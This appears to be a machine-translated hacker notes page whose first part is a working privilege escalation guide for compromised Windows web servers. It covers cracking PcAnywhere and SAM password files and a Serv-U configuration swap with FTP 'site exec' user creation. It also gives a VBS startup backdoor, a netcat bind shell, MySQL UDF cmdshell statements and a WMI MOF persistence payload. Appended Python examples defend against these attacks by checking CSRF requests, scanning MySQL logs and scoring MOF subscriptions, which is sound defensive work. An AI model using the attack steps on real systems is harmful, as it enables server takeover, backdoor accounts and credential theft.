Hacker Notes: Industry terminology

Source: Internet
Author: User
Tags: csrf, attack, pcanywhere

Reference Links:

Http://bbs.51cto.com/thread-623419-1.html

CSRF:

Cross-site request forgery

An attack that relies on the user's identity: it abuses the web site's trust in an authenticated user by tricking the user's browser into sending HTTP requests to the target site. Because an IMG tag makes the browser issue a GET request, such a tag can be used to carry out a CSRF attack.

Privilege escalation ("right to raise" in the machine translation):

Raising one's own permissions on the server. It mostly comes up during a web site intrusion: once a site has been compromised, various vulnerabilities are used to elevate the webshell's permissions until the server itself is taken. The main methods are as follows.

Method 1: PcAnywhere. If the PcAnywhere server side is installed, the administrator's convenience is also ours: download the *.cif files from <system disk>\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\, crack them locally, and connect with PcAnywhere.

Method 2: Serv-U. Sites are usually designed on the administrator's own machine and then uploaded, so FTP is in use, and the FTP server most often found is Serv-U. Escalating through Serv-U requires its installation directory to be writable. First use the webshell to download ServUDaemon.ini from the Serv-U installation folder. Install Serv-U locally, overwrite the local ServUDaemon.ini with the downloaded one, start it, and add a user set as system administrator with directory C:\ and execute permission. Then replace ServUDaemon.ini in the server's Serv-U installation directory with the modified one. Connect with FTP using the new user and password:

ftp> open ip
connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): ID          // the user just added
331 User name okay, please send complete E-mail address as password.
Password: password            // the password
User logged in, proceed.
ftp> cd winnt                 // enter the Win2K directory
Directory changed to /winnt
ftp> cd system32              // enter the system32 directory
Directory changed to /winnt/system32
ftp> quote site exec net.exe user Rover Rover1234 /add

This uses the system's net.exe to add a user. If the response is that there is no permission, upload the backdoor (server.exe) to the system32 directory and write a VBS script:

Set WshShell = CreateObject("WScript.Shell")
a = WshShell.Run("cmd.exe /c net user User Pass /add", 0)
b = WshShell.Run("cmd.exe /c net localgroup Administrators User /add", 0)
c = WshShell.Run("cmd.exe /c server.exe", 0)

Save it as xx.vbe. The script creates the user User with the password Pass, promotes it to administrator, and then runs server.exe from the system32 directory. Put the script in C:\Documents and Settings\All Users\Start Menu\Programs\Startup, so the administrator executes it as soon as they log in; then wait for the login.

Method 3: Writable services and startup programs. Check which system services, programs started together with the system, and software the administrator uses often (Norton, Vadministrator, Jinshan, Rising, WinRAR, even QQ) are writable. If such a program can be modified, bind a batch file or VBS to it and wait for the server to restart.

Method 4: Configuration files. Look for conn and config files and read through them to see whether an SA or MySQL password can be obtained; there may be other gains as well.

Method 5: FlashFXP. FlashFXP can also be used to escalate, but the success rate depends on luck. Find the FlashFXP folder and open Sites.dat: it holds user names and passwords, the passwords in obscured form. Copy these files back to your own machine and replace the corresponding local files; opening FlashFXP then shows the other side's site manager, with the user names and the passwords shown as asterisks. Revealing them with an XP asterisk password viewer and comparing against the values in Sites.dat shows that the passwords are not encrypted but stored in clear text, so the webmaster's passwords can be picked out of the file. Those servers can then be connected to as well (and a few more zombie hosts collected on the way; but the point here is privilege escalation, so don't stop halfway). After testing: copying the Sites.dat file with its user names and passwords over the corresponding local file restores the other administrator's password for every site locally.

Method 6: IIS ISAPI extensions loaded as SYSTEM. On Win2K+IIS5.0 the Application Protection option defaults to "Medium (Pooled)", and IIS loads ISAPI extensions under the IWAM_computername identity. By default, however, Win2K+IIS5 loads certain special ISAPI DLLs under the SYSTEM identity. Win2K+IIS5, Win2K+IIS5+SP1 and Win2K+IIS5+SP2 decide this by file name alone, with no directory restriction; the ISAPI DLLs loaded with system permissions are:

1. idq.dll
2. httpext.dll
3. httpodbc.dll
4. ssinc.dll
5. msw3prt.dll
6. author.dll
7. admin.dll
8. shtml.dll
9. sspifilt.dll
10. compfilt.dll
11. pwsdata.dll
12. md5filt.dll
13. fpexedll.dll

So it is easy to get system permissions this way. The file-name check also has a bug: a request for /scripts/test%81%5cssinc.dll is treated as a request for ssinc.dll too, because the path separation does not take the double-byte (Far East) versions into account. ssinc.dll also handles include file paths badly: of "/" and "\" it only recognizes "/", so an include path written with "\" is processed wrongly, which may leak something or give a permission vulnerability; the same vulnerability exists in many other places (PHP, ASP, etc.).

The fix should be to load these ISAPIs by path rather than by file name alone. By default the paths are:

1. idq.dll: d:\winnt\system32\idq.dll
2. httpext.dll: d:\winnt\system32\inetsrv\httpext.dll
3. httpodbc.dll: d:\winnt\system32\inetsrv\httpodbc.dll
4. ssinc.dll: d:\winnt\system32\inetsrv\ssinc.dll
5. msw3prt.dll: d:\winnt\system32\msw3prt.dll
6. author.dll: D:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\_vti_aut\author.dll
7. admin.dll: D:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\_vti_adm\admin.dll
8. shtml.dll: D:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\shtml.dll
9. sspifilt.dll: d:\winnt\system32\inetsrv\sspifilt.dll
10. compfilt.dll: d:\winnt\system32\inetsrv\compfilt.dll
11. pwsdata.dll: d:\winnt\system32\inetsrv\pwsdata.dll
12. md5filt.dll: d:\winnt\system32\inetsrv\md5filt.dll
13. fpexedll.dll: D:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\bin\fpexedll.dll

Normally guest cannot write to these paths, but with poor configuration the IIS user may be able to, and then permissions can be elevated just the same: upload ISAPIHack.dll to an IIS executable directory under one of the 13 file names above (ssinc.dll, admin.dll, and so on), then wait for IIS to restart and load the DLL, and the permission is obtained.

Method 7: The SAM file. Download %windir%\repair\sam.* (sam._ on WinNT 4, sam on Windows 2000) and crack it with L0pht or similar software; as long as you can get the file and are willing to spend the time, it will crack.

Method 8: PipeUpAdmin (Windows 2000). When run locally it adds the current user account to the Administrators group. Both normal users and Guests group users can run it successfully.

Method 9: Serv-U FTP Server local privilege escalation vulnerability. On many hosts the C:\Documents and Settings\All Users\Documents directory, and several subdirectories under it, have no permissions set, so the exploit can be uploaded to and run from there. Upload the Serv-U local exploit and nc directly, name the Serv-U local escalation program su.exe and put it in C:\Documents and Settings\All Users\Documents, then use it to create a user directly or to bounce a shell back. The commands:

Create a user: serv-u.exe "cmd" >user xl >pass 111111
Bounce a shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

Method 10: UDF privilege escalation. Condition: the password of a MySQL account with root permission. The statements are as follows:
create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user iis_user 123 /add');
select cmdshell('net localgroup administrators iis_user /add');
select cmdshell('regedit /s d:\web\3389.reg');
drop function cmdshell;
select cmdshell('netstat -an');

Method 11: MOF privilege escalation. The MOF file:

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "root\\cimv2";
    Name = "filtP2";
    Query = "SELECT * FROM __InstanceModificationEvent "
            "WHERE TargetInstance ISA \"Win32_LocalTime\" "
            "AND TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
        "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};

instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
Stop the firewall service: net stop "Windows Firewall/Internet Connection Sharing (ICS)"

Save the above as xxx.mof.

1. Find a writable directory and upload the MOF file.
2. Execute the SQL:

select load_file('C:\\recycler\\nullevt.mof') into dumpfile 'C:/windows/system32/wbem/mof/nullevt.mof';

Tapjacking:

Touch-screen hijacking. http://blog.trendmicro.com/trendlabs-security-intelligence/tapjacking-an-untapped-threat-in-android/
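The CSRF entry at the top of these notes says the attack rides on the browser's trust relationship (cookies are attached automatically) and that an IMG tag can trigger a GET. The following is an added example, not code from the original notes, showing the server-side check that closes that gap: a state change is accepted only for a POST whose Origin (or Referer) is the site's own and whose form carries a token bound to the session. The Request type, SITE_ORIGIN, SERVER_KEY, the session id and the three sample requests are all constructed for the example; no web framework is involved.

```python
import hmac
import hashlib
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "https://bank.example"             # constructed: origin of the protected site
SERVER_KEY = b"constructed-server-side-secret"   # assumption: a secret the browser never sees


@dataclass
class Request:
    """Constructed stand-in for an incoming HTTP request."""
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def csrf_token_for(session_id: str) -> str:
    # Token bound to the session by HMAC: a forged request cannot carry it
    # without knowing SERVER_KEY, which the attacker's page never sees.
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def vulnerable_transfer(req: Request) -> bool:
    # The weakness the CSRF entry describes: only the session cookie is consulted,
    # so any request the victim's browser sends (an <img> GET included) is honoured.
    return "session" in req.cookies


def _origin_ok(req: Request) -> bool:
    origin = req.headers.get("Origin")
    if origin is None:
        # Clients that omit Origin: fall back to the Referer's scheme and host.
        ref = req.headers.get("Referer")
        if ref is None:
            return False        # no evidence of where the request came from: reject
        parts = urlsplit(ref)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == SITE_ORIGIN


def hardened_transfer(req: Request) -> bool:
    # Accept a state change only when all three hold: it is a POST (a GET never
    # mutates state, which removes the <img> trick), Origin/Referer is our own,
    # and the form carries the token that matches the session cookie.
    if req.method != "POST":
        return False
    session_id = req.cookies.get("session")
    if session_id is None or not _origin_ok(req):
        return False
    supplied = req.form.get("csrf_token", "")
    expected = csrf_token_for(session_id)
    return hmac.compare_digest(supplied.encode(), expected.encode())


VICTIM_SESSION = "sess-constructed-0001"   # constructed session id


def forged_img_get() -> Request:
    # What <img src="https://bank.example/transfer?to=attacker"> on an attacker's page
    # produces: the cookie rides along, no Origin header, Referer is the attacker's page.
    return Request("GET", "/transfer", headers={"Referer": "https://evil.example/page"},
                   cookies={"session": VICTIM_SESSION}, form={"to": "attacker"})


def forged_cross_site_post() -> Request:
    # An auto-submitted form on the attacker's page: cookie present, foreign Origin, no token.
    return Request("POST", "/transfer", headers={"Origin": "https://evil.example"},
                   cookies={"session": VICTIM_SESSION}, form={"to": "attacker"})


def legitimate_post() -> Request:
    # The site's own form: same Origin and the session-bound token.
    return Request("POST", "/transfer", headers={"Origin": SITE_ORIGIN},
                   cookies={"session": VICTIM_SESSION},
                   form={"to": "friend", "csrf_token": csrf_token_for(VICTIM_SESSION)})


def demo() -> dict:
    """Map each constructed case to (vulnerable accepts?, hardened accepts?)."""
    cases = {"img_get": forged_img_get(), "cross_site_post": forged_cross_site_post(),
             "legitimate": legitimate_post()}
    return {name: (vulnerable_transfer(r), hardened_transfer(r)) for name, r in cases.items()}


if __name__ == "__main__":
    for name, (vuln, hard) in demo().items():
        print(f"{name:16s} vulnerable accepts={vuln!s:5}  hardened accepts={hard}")
```

The vulnerable handler accepts all three requests because all three carry the victim's cookie; the hardened one accepts only the site's own POST. The Referer fallback is there for clients that omit Origin, and a request with neither header is rejected rather than trusted.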
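Methods 10 and 11 above both go through the MySQL server: a CREATE FUNCTION ... SONAME to load a UDF, calls to that function, and a SELECT ... INTO DUMPFILE that drops the MOF into the wbem\mof directory. Every one of those statements lands in the general query log, so the added example below (written for these notes, not part of the original) scans general-log lines for that sequence. The log excerpt is constructed in the MySQL 5.7 file format (timestamp, connection id, command, argument) and modelled on the statements in the two methods; the sensitive-directory list is an assumption for the example.

```python
import re
from typing import Dict, List

# One general-log line (MySQL 5.7 file format): timestamp, connection id, command, argument.
LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<id>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")
CREATE_UDF = re.compile(r"\bcreate\s+(?:aggregate\s+)?function\s+(\w+)\b.*?\bsoname\b", re.I | re.S)
DROP_FN = re.compile(r"\bdrop\s+function\s+(?:if\s+exists\s+)?(\w+)", re.I)
FILE_WRITE = re.compile(r"\binto\s+(?:dumpfile|outfile)\s+'([^']+)'", re.I)
LOAD_FILE = re.compile(r"\bload_file\s*\(", re.I)
# Assumed list: directories where a write by the database account means code execution or persistence.
SENSITIVE_DIRS = ("wbem/mof", "system32", "/plugin", "startup", "inetsrv")


def _alert(alerts: List[Dict], conn: str, rule: str, severity: str, sql: str) -> None:
    alerts.append({"conn": conn, "rule": rule, "severity": severity, "sql": sql})


def scan_general_log(lines) -> List[Dict]:
    """Walk general-log lines in order and flag UDF loading, calls to a loaded UDF,
    file writes (severity by target directory) and LOAD_FILE reads."""
    alerts: List[Dict] = []
    udfs_seen = set()          # function names registered with SONAME so far
    for line in lines:
        m = LINE.match(line)
        if not m or m.group("cmd") != "Query":
            continue           # header line, Connect/Quit records, etc.
        conn, sql = m.group("id"), m.group("arg")
        c = CREATE_UDF.search(sql)
        if c:
            udfs_seen.add(c.group(1).lower())
            _alert(alerts, conn, "udf_loaded:" + c.group(1).lower(), "high", sql)
            continue
        d = DROP_FN.search(sql)
        if d and d.group(1).lower() in udfs_seen:
            udfs_seen.discard(d.group(1).lower())
            _alert(alerts, conn, "udf_dropped:" + d.group(1).lower(), "low", sql)
            continue
        for name in sorted(udfs_seen):
            if re.search(r"\b" + re.escape(name) + r"\s*\(", sql, re.I):
                _alert(alerts, conn, "udf_called:" + name, "high", sql)
        w = FILE_WRITE.search(sql)
        if w:
            target = w.group(1).replace("\\", "/").lower()
            sev = "high" if any(s in target for s in SENSITIVE_DIRS) else "medium"
            _alert(alerts, conn, "file_write:" + w.group(1), sev, sql)
        if LOAD_FILE.search(sql):
            _alert(alerts, conn, "load_file", "medium", sql)
    return alerts


# Constructed log excerpt modelled on the statements in methods 10 and 11 above.
SAMPLE_LOG = """\
Time                 Id Command    Argument
2024-03-01T02:10:01.000000Z     17 Connect   root@10.0.0.5 on  using TCP/IP
2024-03-01T02:10:02.000000Z     17 Query     select * from orders where id = 5
2024-03-01T02:10:05.000000Z     17 Query     create function cmdshell returns string soname 'udf.dll'
2024-03-01T02:10:06.000000Z     17 Query     select cmdshell('net user iis_user 123 /add')
2024-03-01T02:10:07.000000Z     17 Query     select cmdshell('net localgroup administrators iis_user /add')
2024-03-01T02:10:08.000000Z     17 Query     drop function cmdshell
2024-03-01T02:10:20.000000Z     17 Query     select load_file('C:\\\\recycler\\\\nullevt.mof') into dumpfile 'C:/windows/system32/wbem/mof/nullevt.mof'
2024-03-01T02:10:30.000000Z     18 Query     select name into outfile '/tmp/names.csv' from customers
2024-03-01T02:10:31.000000Z     17 Quit
"""


if __name__ == "__main__":
    for a in scan_general_log(SAMPLE_LOG.splitlines()):
        print(f"[{a['severity']:6}] conn {a['conn']}: {a['rule']}  <- {a['sql'][:60]}")
```

Tracking UDF names per log rather than matching a fixed list is what makes the second and third alerts fire: the function name is whatever the attacker chose, so the scanner learns it from the CREATE FUNCTION and watches for calls to it until the DROP. The benign SELECT on connection 17 and the export on connection 18 show the two non-findings: no alert at all, and a medium-severity write outside the sensitive directories.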
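Method 11 above plants a permanent WMI event subscription: an __EventFilter that fires on a Win32_LocalTime change, an ActiveScriptEventConsumer that runs JScript, and a __FilterToConsumerBinding tying them together. The added example below (written for these notes, not part of the original) pulls those three object types out of a MOF file and scores each binding so a defender can triage dropped .mof files or subscriptions exported back to MOF. The parser is a deliberately small MOF subset parser written for this example, not a MOF compiler; SAMPLE_MOF is the page's own subscription reproduced as input, and BENIGN_MOF is a constructed subscription that only writes an event-log entry.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Small MOF subset parser written for this example: instances, aliases, and
# properties whose values are string literals (possibly several, concatenated).
_INSTANCE = re.compile(r"instance of\s+(\w+)(?:\s+as\s+(\$\w+))?\s*\{(.*?)\};", re.S)
_PROP = re.compile(r"(\w+)\s*=\s*(.*?);", re.S)
_STR = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)


def _unescape(s: str) -> str:
    # One pass over backslash escapes: \n -> newline, \" -> ", \\ -> \
    return re.sub(r"\\(.)", lambda m: "\n" if m.group(1) == "n" else m.group(1), s)


@dataclass
class Instance:
    cls: str
    alias: Optional[str]
    props: Dict[str, str]


def parse_mof(text: str) -> List[Instance]:
    out = []
    for cls, alias, body in _INSTANCE.findall(text):
        props = {}
        for key, raw in _PROP.findall(body):
            parts = _STR.findall(raw)
            # Adjacent string literals concatenate (as the Query in method 11 does).
            props[key] = "".join(_unescape(p) for p in parts) if parts else raw.strip()
        out.append(Instance(cls, alias or None, props))
    return out


# Consumers that run code supplied in the subscription when their filter fires.
CODE_CONSUMERS = {"ActiveScriptEventConsumer", "CommandLineEventConsumer"}
SUSPICIOUS = ("wscript.shell", "net.exe user", "net user", "localgroup administrators",
              "powershell", "cmd.exe")


def assess_bindings(text: str) -> List[Dict]:
    """One finding per __FilterToConsumerBinding: what it ties together and why it matters."""
    insts = parse_mof(text)
    by_alias = {i.alias: i for i in insts if i.alias}
    findings = []
    for b in insts:
        if b.cls != "__FilterToConsumerBinding":
            continue
        cons = by_alias.get(b.props.get("Consumer", ""))
        filt = by_alias.get(b.props.get("Filter", ""))
        reasons = []
        if cons and cons.cls in CODE_CONSUMERS:
            reasons.append("consumer executes code (" + cons.cls + ")")
            payload = (cons.props.get("ScriptText", "") + cons.props.get("CommandLineTemplate", "")).lower()
            hits = [s for s in SUSPICIOUS if s in payload]
            if hits:
                reasons.append("payload mentions " + ", ".join(hits))
        if filt and "win32_localtime" in filt.props.get("Query", "").lower():
            reasons.append("timer-style trigger on Win32_LocalTime")
        findings.append({"consumer": cons.props.get("Name") if cons else None,
                         "filter": filt.props.get("Name") if filt else None,
                         "score": len(reasons), "reasons": reasons})
    return findings


# The subscription from method 11 above, reproduced as input.
SAMPLE_MOF = r"""
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "root\\cimv2";
    Name = "filtP2";
    Query = "SELECT * FROM __InstanceModificationEvent "
            "WHERE TargetInstance ISA \"Win32_LocalTime\" "
            "AND TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
"""

# Constructed benign subscription: writes an event-log entry on low disk space, runs no script.
BENIGN_MOF = r"""
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $F
{
    Name = "LowDiskFilter";
    EventNamespace = "root\\cimv2";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 "
            "WHERE TargetInstance ISA \"Win32_LogicalDisk\" AND TargetInstance.FreeSpace < 104857600";
    QueryLanguage = "WQL";
};
instance of NTEventLogEventConsumer as $C
{
    Name = "LowDiskLog";
    SourceName = "DiskMonitor";
    EventID = 1;
};
instance of __FilterToConsumerBinding { Consumer = $C; Filter = $F; };
"""
```

The score is simply the number of reasons: the page's subscription earns three (a script-running consumer, a payload that names WScript.Shell and net.exe user, and a Win32_LocalTime trigger that fires every minute), while the constructed benign one earns none. Resolving the binding through aliases matters because the filter and consumer can sit anywhere in the file, or in separate files compiled at different times.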
